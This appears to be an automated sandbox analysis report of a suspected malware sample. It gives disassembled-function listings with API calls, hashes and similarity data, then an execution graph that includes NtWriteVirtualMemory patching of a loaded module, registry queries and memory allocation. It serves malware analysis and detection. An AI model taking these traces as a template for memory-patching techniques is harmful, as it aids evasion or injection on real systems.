                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                              • _malloc.LIBCMT ref: 0041724C
                                                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                              • __freea.LIBCMT ref: 004172A4
                                                                                                                              • __freea.LIBCMT ref: 004172AD
                                                                                                                              • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                              • ___convertcp.LIBCMT ref: 00417309
                                                                                                                              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                              • _malloc.LIBCMT ref: 00417362
                                                                                                                              • _memset.LIBCMT ref: 00417384
                                                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                              • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                              • __freea.LIBCMT ref: 004173CF
                                                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3809854901-0
                                                                                                                              • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                              • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                              • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                              • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 004057DE
                                                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                              • _malloc.LIBCMT ref: 00405842
                                                                                                                              • _malloc.LIBCMT ref: 00405906
                                                                                                                              • _malloc.LIBCMT ref: 00405930
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _malloc$AllocateHeap
                                                                                                                              • String ID: 1.2.3
                                                                                                                              • API String ID: 680241177-2310465506
                                                                                                                              • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                              • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                              • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                              • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3886058894-0
                                                                                                                              • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                              • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                              • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                              • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                              APIs
                                                                                                                              • EntryPoint.RPKHZPUO(80070057), ref: 004017EE
                                                                                                                                • Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
                                                                                                                                • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                              • EntryPoint.RPKHZPUO(80070057), ref: 00401800
                                                                                                                              • EntryPoint.RPKHZPUO(80070057), ref: 00401813
                                                                                                                              • __recalloc.LIBCMT ref: 00401828
                                                                                                                              • EntryPoint.RPKHZPUO(8007000E), ref: 00401839
                                                                                                                              • EntryPoint.RPKHZPUO(8007000E), ref: 00401853
                                                                                                                              • _calloc.LIBCMT ref: 00401861
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1721462702-0
                                                                                                                              • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                              • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                              • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                              • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                              APIs
                                                                                                                              • __getptd.LIBCMT ref: 00414744
                                                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                              • __getptd.LIBCMT ref: 0041475B
                                                                                                                              • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                              • __lock.LIBCMT ref: 00414779
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                              • String ID: @.B
                                                                                                                              • API String ID: 3521780317-470711618
                                                                                                                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                              • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                              • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                              APIs
                                                                                                                              • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                              • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                              • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                              • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                              • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2805327698-0
                                                                                                                              • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                              • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                              • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                              • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                              APIs
                                                                                                                              • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                              • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                              • __lock.LIBCMT ref: 00414008
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                              • InterlockedIncrement.KERNEL32(33861688), ref: 00414050
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4271482742-0
                                                                                                                              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                              • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                              • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                                              • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                              • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                              • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                              • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                              APIs
                                                                                                                              • __fileno.LIBCMT ref: 0040C77C
                                                                                                                              • __locking.LIBCMT ref: 0040C791
                                                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2395185920-0
                                                                                                                              • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                              • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                              • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                              • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _fseek_malloc_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 208892515-0
                                                                                                                              • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                              • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                              • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                              • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                              APIs
                                                                                                                              • __flush.LIBCMT ref: 0040BB6E
                                                                                                                              • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                              • __locking.LIBCMT ref: 0040BB95
                                                                                                                              • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3240763771-0
                                                                                                                              • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                              • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                              • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                              • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                              APIs
                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3058430110-0
                                                                                                                              • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                              • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                              • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                              • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3016257755-0
                                                                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                              • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                              • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:9.2%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:179
                                                                                                                              Total number of Limit Nodes:12
                                                                                                                              execution_graph 24319 2bebb3c 24322 2bdec6c 24319->24322 24323 2bdec74 24322->24323 24323->24323 26673 2bd8704 LoadLibraryW 24323->26673 24325 2bdec96 24326 2bdec9b 24325->24326 24327 2bdeca5 24326->24327 24328 2bd86fc 24327->24328 24329 2bdecab 24328->24329 24330 2bdecaf 24329->24330 24331 2bdecc0 24329->24331 26687 2bc4500 24330->26687 24332 2bc4500 8 API calls 24331->24332 24334 2bdecbe 24332->24334 26678 2bc480c 24334->26678 26693 2bd80c0 26673->26693 26675 2bd873d 26701 2bd7cf8 26675->26701 26679 2bc481d 26678->26679 26680 2bc485a 26679->26680 26681 2bc4843 26679->26681 26683 2bc4570 8 API calls 26680->26683 26682 2bc4b78 8 API calls 26681->26682 26684 2bc4850 26682->26684 26683->26684 26685 2bc488b 26684->26685 26686 2bc4500 8 API calls 26684->26686 26686->26685 26689 2bc4504 26687->26689 26691 2bc4514 26687->26691 26688 2bc4542 26688->24334 26690 2bc4570 8 API calls 26689->26690 26689->26691 26690->26691 26691->26688 26692 2bc2c2c 8 API calls 26691->26692 26692->26688 26694 2bc4500 8 API calls 26693->26694 26695 2bd80e5 26694->26695 26712 2bd790c 26695->26712 26697 2bd80f2 26698 2bd8112 GetProcAddress GetProcAddress 26697->26698 26716 2bc44d0 26698->26716 26702 2bc4500 8 API calls 26701->26702 26703 2bd7d1d 26702->26703 26704 2bd790c 8 API calls 26703->26704 26705 2bd7d2a 26704->26705 26754 2bd8018 26705->26754 26708 2bd80c0 10 API calls 26709 2bd7d53 NtWriteVirtualMemory 26708->26709 26710 2bc44d0 8 API calls 26709->26710 26711 2bd7d8c FreeLibrary 26710->26711 26711->24325 26713 2bd791d 26712->26713 26720 2bc4b78 26713->26720 26715 2bd792d 26715->26697 26718 2bc44d6 26716->26718 26717 2bc44fc 26717->26675 26718->26717 26719 2bc2c2c 8 API calls 26718->26719 26719->26718 26721 2bc4b85 26720->26721 26725 2bc4bb5 26720->26725 26723 2bc4b91 26721->26723 26726 2bc4570 26721->26726 26723->26715 26731 2bc44ac 26725->26731 26727 2bc4598 26726->26727 26728 2bc4574 26726->26728 26727->26725 26735 2bc2c10 26728->26735 26730 2bc4581 26730->26725 26732 2bc44b2 26731->26732 26734 2bc44cd 26731->26734 26732->26734 26745 2bc2c2c 26732->26745 26734->26723 26736 2bc2c14 26735->26736 26737 2bc2c27 26735->26737 26738 2bc2c1e 26736->26738 26739 2bc2d19 26736->26739 26743 2bc64cc TlsGetValue 26736->26743 26737->26730 26738->26730 26744 2bc2ce8 7 API calls 26739->26744 26742 2bc2d3a 26742->26730 26743->26739 26744->26742 26746 2bc2c3a 26745->26746 26747 2bc2c30 26745->26747 26746->26734 26747->26746 26748 2bc2d19 26747->26748 26752 2bc64cc TlsGetValue 26747->26752 26753 2bc2ce8 7 API calls 26748->26753 26751 2bc2d3a 26751->26734 26752->26748 26753->26751 26755 2bc4500 8 API calls 26754->26755 26756 2bd803b 26755->26756 26757 2bd790c 8 API calls 26756->26757 26758 2bd8048 26757->26758 26759 2bd80c0 10 API calls 26758->26759 26760 2bd8061 GetModuleHandleA 26759->26760 26761 2bc44ac 8 API calls 26760->26761 26762 2bd7d4d 26761->26762 26762->26708 26763 2bc1a8f 26764 2bc170d 26763->26764 26765 2bc1aa1 26763->26765 26764->26763 26766 2bc1aa7 26764->26766 26767 2bc16e8 26764->26767 26768 2bc1c66 26764->26768 26765->26766 26770 2bc1b13 Sleep 26765->26770 26769 2bc1ab0 26766->26769 26773 2bc1b4b Sleep 26766->26773 26776 2bc1b81 26766->26776 26779 2bc1644 Sleep Sleep 26767->26779 26770->26766 26772 2bc1b2d Sleep 26770->26772 26772->26765 26775 2bc1b61 Sleep 26773->26775 26773->26776 26774 2bc16f5 VirtualFree 26774->26764 26775->26766 26777 2bc1c00 VirtualFree 26776->26777 26778 2bc1ba4 26776->26778 26779->26774 26780 2bc6518 26781 2bc6523 26780->26781 26784 2bc4168 26781->26784 26783 2bc655d 26785 2bc41ae 26784->26785 26788 2bc422c 26785->26788 26796 2bc4100 26785->26796 26787 2bc43e9 26801 2bc432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 26787->26801 26788->26783 26788->26787 26791 2bc43fa 26788->26791 26790 2bc43f3 26790->26791 26792 2bc443f FreeLibrary 26791->26792 26793 2bc4463 26791->26793 26792->26791 26794 2bc446c 26793->26794 26795 2bc4472 ExitProcess 26793->26795 26794->26795 26797 2bc4110 26796->26797 26798 2bc4143 26796->26798 26797->26798 26802 2bc5814 26797->26802 26806 2bc15cc 26797->26806 26798->26788 26801->26790 26803 2bc5840 26802->26803 26804 2bc5824 GetModuleFileNameA 26802->26804 26803->26797 26810 2bc5a78 GetModuleFileNameA RegOpenKeyExA 26804->26810 26829 2bc1560 26806->26829 26808 2bc15d4 VirtualAlloc 26809 2bc15eb 26808->26809 26809->26797 26811 2bc5afb 26810->26811 26812 2bc5abb RegOpenKeyExA 26810->26812 26828 2bc58b4 6 API calls 26811->26828 26812->26811 26813 2bc5ad9 RegOpenKeyExA 26812->26813 26813->26811 26815 2bc5b84 lstrcpyn GetThreadLocale GetLocaleInfoA 26813->26815 26819 2bc5c9e 26815->26819 26820 2bc5bbb 26815->26820 26816 2bc5b20 RegQueryValueExA 26817 2bc5b40 RegQueryValueExA 26816->26817 26818 2bc5b62 RegCloseKey 26816->26818 26817->26818 26822 2bc5b5e 26817->26822 26818->26803 26819->26803 26820->26819 26821 2bc5bcb lstrlen 26820->26821 26823 2bc5be3 26821->26823 26822->26818 26823->26819 26824 2bc5c08 lstrcpyn LoadLibraryExA 26823->26824 26825 2bc5c30 26823->26825 26824->26825 26825->26819 26826 2bc5c3a lstrcpyn LoadLibraryExA 26825->26826 26826->26819 26827 2bc5c6c lstrcpyn LoadLibraryExA 26826->26827 26827->26819 26828->26816 26830 2bc1500 26829->26830 26830->26808 26831 2bc4e88 26832 2bc4e95 26831->26832 26836 2bc4e9c 26831->26836 26837 2bc4be4 26832->26837 26840 2bc4bfc 26836->26840 26838 2bc4be8 SysAllocStringLen 26837->26838 26839 2bc4bdc 26837->26839 26838->26839 26839->26836 26841 2bc4c08 26840->26841 26842 2bc4c02 SysFreeString 26840->26842 26842->26841 26843 2bebb48 timeSetEvent 26844 2bc1727 26845 2bc173c 26844->26845 26846 2bc1968 26844->26846 26855 2bc17cb Sleep 26845->26855 26858 2bc174e 26845->26858 26847 2bc1a80 26846->26847 26848 2bc1938 26846->26848 26849 2bc1a89 26847->26849 26850 2bc1684 VirtualAlloc 26847->26850 26854 2bc1947 Sleep 26848->26854 26861 2bc1986 26848->26861 26852 2bc16df 26850->26852 26853 2bc16af 26850->26853 26851 2bc175d 26869 2bc1644 Sleep Sleep 26853->26869 26859 2bc195d Sleep 26854->26859 26854->26861 26855->26858 26860 2bc17e4 Sleep 26855->26860 26857 2bc182c 26867 2bc15cc VirtualAlloc 26857->26867 26868 2bc1838 26857->26868 26858->26851 26858->26857 26863 2bc180a Sleep 26858->26863 26859->26848 26860->26845 26864 2bc15cc VirtualAlloc 26861->26864 26866 